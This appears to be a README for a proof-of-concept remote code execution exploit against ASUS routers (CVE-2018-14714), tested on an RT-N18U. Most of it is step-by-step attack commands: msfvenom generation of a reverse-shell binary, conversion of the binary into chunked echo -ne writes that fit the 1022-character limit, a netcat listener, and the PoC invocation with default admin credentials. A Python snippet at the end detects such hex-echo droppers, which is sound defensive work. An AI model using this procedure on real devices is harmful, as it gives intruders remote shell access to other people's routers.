ASUS wifi router RCE vulnerability
This PoC is for learning and research purposes only. Do not use it for illegal activities; you are solely responsible for any legal consequences.
- This is a test conducted after code modifications based on this PoC, as the original PoC might have failed due to lacking root permissions.
In the demonstration below, the tested device model is an ASUS RT-N18U, a router I purchased during my university years. It is now my test machine :)
You can use the msfvenom command to generate a lightweight reverse-shell ELF binary. Adjust the payload and architecture parameters to match the kernel environment of the target. In my case, it's armv7l, and the command is as follows:
$ msfvenom -p linux/armle/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o pwn.elf
Convert the generated binary into a hex string, then turn that string into an `echo -ne` command that writes the bytes back out on the target.
$ for i in `cat pwn.elf | xxd -p`;do echo -n $i;done
$ python3 -c 'a=input("binary data:");print("echo -ne \"",end="");print(*[f"\\x{a[i:i+2]}" for i in range(0,len(a),2)],sep="",end="");print("\"")'
To confirm that the target is vulnerable, run the Python PoC script with the additional `shell` argument to enter an interactive pseudo-shell. Note that it is normal for commands to produce no output, since there is nowhere for stdout to be returned; running a sleep command and timing the response lets you verify that the commands really are being executed.
Additionally, based on testing, the command line accepts at most 1022 characters, so each injected command must be shorter than 1022 characters. The payload therefore has to be split manually and written out in several parts for the command to run successfully.
- Next, obtain a real reverse shell. Start by listening on the port specified in the payload:
  $ nc -lvnp 4444
- Run the Python PoC script to get the pseudo-shell used for injecting the payload:
  $ python3 CVE-2018-14714-RCE_PoC.py admin admin shell
- Finally, all that's left is to enjoy your acquired reverse shell :)
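From the defender's side, the footprint of this technique is distinctive: the binary arrives as a series of short `echo -ne "\x.."` appends, each kept under the 1022-character command limit described above. The following Python snippet is an added example (not part of this PoC repository) that flags such commands in captured command lines and checks whether a chunk carries the ELF header; the sample lines are constructed.

```python
import re

# Matches an `echo -ne "<\xNN escapes>"` dropper, the write pattern used above.
HEX_ECHO_RE = re.compile(r'echo\s+-ne\s+"((?:\\x[0-9a-fA-F]{2})+)"')
ELF_MAGIC = b"\x7fELF"        # first four bytes of every ELF file
ROUTER_CMD_LIMIT = 1022       # per-command limit observed on the router

def decode_escapes(escaped: str) -> bytes:
    """Turn a run of \\xNN escapes back into the bytes echo -ne would write."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", escaped))

def inspect_command(cmd: str) -> dict:
    """Describe a command that writes raw bytes through echo -ne escapes."""
    m = HEX_ECHO_RE.search(cmd)
    if not m:
        return {"suspicious": False}
    payload = decode_escapes(m.group(1))
    return {
        "suspicious": True,
        "bytes_written": len(payload),
        "elf_header": payload.startswith(ELF_MAGIC),   # first chunk of a binary
        "appends": ">>" in cmd,                        # chunked write to one file
        "near_limit": len(cmd) > ROUTER_CMD_LIMIT - 64, # sized to the 1022 limit
    }

def scan(lines):
    """Return (line, info) for every line that looks like a hex-echo dropper."""
    results = [(line, inspect_command(line)) for line in lines]
    return [(line, info) for line, info in results if info["suspicious"]]

# Constructed sample command lines (hypothetical, not from a real device).
SAMPLE_LINES = [
    "ls -la /tmp",
    'echo -ne "\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00" >> /tmp/pwn.elf',
    'echo -ne "\\x00\\x00\\x00\\x00" >> /tmp/pwn.elf',
]

if __name__ == "__main__":
    for line, info in scan(SAMPLE_LINES):
        print(info, line[:60])
```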